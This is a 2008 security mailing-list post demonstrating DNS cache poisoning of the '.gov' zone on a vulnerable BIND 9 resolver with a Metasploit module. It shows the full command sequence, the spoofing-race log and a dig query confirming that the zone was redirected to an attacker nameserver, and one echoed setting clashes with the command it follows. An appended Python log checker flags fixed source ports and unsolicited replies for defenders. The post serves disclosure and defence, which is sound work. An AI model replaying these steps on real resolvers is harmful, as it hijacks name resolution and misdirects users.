Dailydave mailing list archives
Re: DNS and other fun.
From: H D Moore <dailydave () digitaloffense net>
Date: Tue, 29 Jul 2008 16:59:00 -0500
Below is an example of poisoning ".gov" on a vulnerable BIND 9 instance. This took about two minutes, no crazy fast packet generation required.

msf > use auxiliary/spoof/dns/bailiwicked_domain
msf auxiliary(bailiwicked_domain) > set RHOST A.B.C.D
RHOST => A.B.C.D
msf auxiliary(bailiwicked_domain) > set DOMAIN gov
DOMAIN => net
msf auxiliary(bailiwicked_domain) > set SRCPORT 0
SRCPORT => 0
msf auxiliary(bailiwicked_domain) > set NEWDNS msfdns.ath.cx
NEWDNS => msfdns.ath.cx
msf auxiliary(bailiwicked_domain) > run
[*] Switching to target port 48178 based on Metasploit service
[*] Warning: target address A.B.C.D is not the same as the nameserver's query source address 72.48.121.197!
[*] Targeting nameserver A.B.C.D for injection of gov. nameservers as msfdns.ath.cx
[*] Querying recon nameserver for gov.'s nameservers...
[*] Got an NS record: gov. 172717 IN NS F.GOV.ZONEEDIT.COM.
[*] Querying recon nameserver for address of F.GOV.ZONEEDIT.COM....
[*] Got an A record: F.GOV.ZONEEDIT.COM. 172717 IN A 66.197.185.229
[*] Checking Authoritativeness: Querying 66.197.185.229 for gov....
[*] F.GOV.ZONEEDIT.COM. is authoritative for gov., adding to list of nameservers to spoof as
[*] Got an NS record: gov. 172717 IN NS G.GOV.ZONEEDIT.COM.
[*] Querying recon nameserver for address of G.GOV.ZONEEDIT.COM....
[*] Got an A record: G.GOV.ZONEEDIT.COM. 172717 IN A 66.135.32.100
[*] Checking Authoritativeness: Querying 66.135.32.100 for gov....
[*] G.GOV.ZONEEDIT.COM. is authoritative for gov., adding to list of nameservers to spoof as
[*] Got an NS record: gov. 172717 IN NS C.GOV.ZONEEDIT.COM.
[*] Querying recon nameserver for address of C.GOV.ZONEEDIT.COM....
[*] Got an A record: C.GOV.ZONEEDIT.COM. 172716 IN A 69.72.142.35
[*] Checking Authoritativeness: Querying 69.72.142.35 for gov....
[*] C.GOV.ZONEEDIT.COM. is authoritative for gov., adding to list of nameservers to spoof as
[*] Got an NS record: gov. 172717 IN NS E.GOV.ZONEEDIT.COM.
[*] Querying recon nameserver for address of E.GOV.ZONEEDIT.COM....
[*] Got an A record: E.GOV.ZONEEDIT.COM. 172716 IN A 82.165.40.134
[*] Checking Authoritativeness: Querying 82.165.40.134 for gov....
[*] E.GOV.ZONEEDIT.COM. is authoritative for gov., adding to list of nameservers to spoof as
[*] Got an NS record: gov. 172717 IN NS D.GOV.ZONEEDIT.COM.
[*] Querying recon nameserver for address of D.GOV.ZONEEDIT.COM....
[*] Got an A record: D.GOV.ZONEEDIT.COM. 172716 IN A 209.97.207.48
[*] Checking Authoritativeness: Querying 209.97.207.48 for gov....
[*] D.GOV.ZONEEDIT.COM. is authoritative for gov., adding to list of nameservers to spoof as
[*] Got an NS record: gov. 172717 IN NS A.GOV.ZONEEDIT.COM.
[*] Querying recon nameserver for address of A.GOV.ZONEEDIT.COM....
[*] Got an A record: A.GOV.ZONEEDIT.COM. 172716 IN A 216.55.155.29
[*] Checking Authoritativeness: Querying 216.55.155.29 for gov....
[*] A.GOV.ZONEEDIT.COM. is authoritative for gov., adding to list of nameservers to spoof as
[*] Got an NS record: gov. 172717 IN NS B.GOV.ZONEEDIT.COM.
[*] Querying recon nameserver for address of B.GOV.ZONEEDIT.COM....
[*] Got an A record: B.GOV.ZONEEDIT.COM. 172715 IN A 206.51.224.229
[*] Checking Authoritativeness: Querying 206.51.224.229 for gov....
[*] B.GOV.ZONEEDIT.COM. is authoritative for gov., adding to list of nameservers to spoof as
[*] Calculating the number of spoofed replies to send per query...
[*] race calc: 100 queries | min/max/avg time: 0.01/0.19/0.04 | min/max/avg replies: 2/118/24
[*] Sending 5 spoofed replies from each nameserver (7) for each query
[*] Attempting to inject poison records for gov.'s nameservers into A.B.C.D:48178...
[*] Sent 1000 queries and 35000 spoofed responses...
[*] Recalculating the number of spoofed replies to send per query...
[*] race calc: 25 queries | min/max/avg time: 0.01/0.11/0.03 | min/max/avg replies: 8/54/22
[*] Now sending 4 spoofed replies from each nameserver (7) for each query
[*] Sent 2000 queries and 63000 spoofed responses...
[*] Recalculating the number of spoofed replies to send per query...
[*] race calc: 25 queries | min/max/avg time: 0.01/0.1/0.02 | min/max/avg replies: 3/35/16
[*] Now sending 3 spoofed replies from each nameserver (7) for each query
[*] Sent 3000 queries and 84000 spoofed responses...
[*] Recalculating the number of spoofed replies to send per query...
[*] race calc: 25 queries | min/max/avg time: 0.01/0.14/0.03 | min/max/avg replies: 3/72/21
[*] Now sending 4 spoofed replies from each nameserver (7) for each query
[*] Sent 4000 queries and 112000 spoofed responses...
[*] Recalculating the number of spoofed replies to send per query...
[*] race calc: 25 queries | min/max/avg time: 0.02/0.08/0.03 | min/max/avg replies: 8/40/28
[*] Now sending 6 spoofed replies from each nameserver (7) for each query
[*] Poisoning successful after 4000 queries and 112000 responses: gov. == msfdns.ath.cx
[*] Auxiliary module execution completed
msf auxiliary(bailiwicked_domain) > dig -t a poisoning_tlds_is_fun_and_fast.gov @A.B.C.D
[*] exec: dig -t a poisoning_tlds_is_fun_and_fast.gov @A.B.C.D

; <<>> DiG 9.3.2 <<>> -t a poisoning_tlds_is_fun_and_fast.gov @A.B.C.D
; (1 server found)
;; global options: printcmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 5757
;; flags: qr rd ra; QUERY: 1, ANSWER: 1, AUTHORITY: 1, ADDITIONAL: 1

;; QUESTION SECTION:
;poisoning_tlds_is_fun_and_fast.gov. IN A

;; ANSWER SECTION:
poisoning_tlds_is_fun_and_fast.gov. 60 IN A 1.3.3.7

;; AUTHORITY SECTION:
gov. 41938 IN NS msfdns.ath.cx.

;; ADDITIONAL SECTION:
msfdns.ath.cx. 3 IN A 71.41.138.124

;; Query time: 23 msec
;; SERVER: A.B.C.D#53(A.B.C.D)
;; WHEN: Tue Jul 29 16:55:08 2008
;; MSG SIZE rcvd: 111

poisoning_tlds_is_fun_and_fast.gov = 1.3.3.7

_______________________________________________
Dailydave mailing list
Dailydave () lists immunitysec com
http://lists.immunitysec.com/mailman/listinfo/dailydave
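A defender-side check, added here and not part of H D Moore's post or the Metasploit module: it reads resolver query/reply log lines in a format assumed for this example (the sample lines are constructed), reports whether every outbound query left from a single UDP source port (the fixed port the module locked onto in the run above), and counts replies that match no outstanding query, which is what a spoof race looks like from the resolver's side (thousands of responses per thousand queries in the log above).

```python
import re
from collections import Counter

# Constructed sample log for this example (not traffic from the post):
# Q = resolver query out, R = reply in; src -> dst, DNS txid, query name.
SAMPLE_LOG = """\
Q 10.0.0.5:48178 -> 66.197.185.229:53 id=5757 gov.
R 66.197.185.229:53 -> 10.0.0.5:48178 id=5757 gov.
Q 10.0.0.5:48178 -> 66.135.32.100:53 id=61002 gov.
R 66.135.32.100:53 -> 10.0.0.5:48178 id=1 gov.
R 66.135.32.100:53 -> 10.0.0.5:48178 id=2 gov.
R 66.135.32.100:53 -> 10.0.0.5:48178 id=3 gov.
R 66.135.32.100:53 -> 10.0.0.5:48178 id=61002 gov.
Q 10.0.0.5:48178 -> 69.72.142.35:53 id=4100 gov.
"""
LINE = re.compile(r"^(Q|R) (\S+):(\d+) -> (\S+):(\d+) id=(\d+) (\S+)$")

def parse(log):
    """Yield (dir, src_ip, src_port, dst_ip, dst_port, txid, qname) tuples."""
    for raw in log.splitlines():
        m = LINE.match(raw.strip())
        if m:  # lines outside the assumed format are skipped
            d, sip, sp, dip, dp, txid, q = m.groups()
            yield d, sip, int(sp), dip, int(dp), int(txid), q

def unsolicited_replies(records):
    """Count replies whose (resolver port, upstream, txid, qname) match no
    outstanding query; a burst of these is what a spoof race looks like."""
    outstanding, bad = set(), 0
    for d, sip, sp, dip, dp, txid, q in records:
        if d == "Q":
            outstanding.add((sp, dip, txid, q))
        elif (dp, sip, txid, q) in outstanding:
            outstanding.discard((dp, sip, txid, q))  # legitimate answer
        else:
            bad += 1
    return bad

def summarize(log):
    """Report the two warning signs: one fixed source port, many stray replies."""
    records = list(parse(log))
    ports = Counter(r[2] for r in records if r[0] == "Q")
    replies = sum(1 for r in records if r[0] == "R")
    return {
        "distinct_source_ports": len(ports),
        "fixed_source_port": len(ports) == 1 and sum(ports.values()) > 1,
        "replies": replies,
        "unsolicited_replies": unsolicited_replies(records),
    }
```

A resolver with source-port randomization shows many distinct ports here, and a healthy one sees close to zero unsolicited replies; either figure drifting the other way is worth an alert.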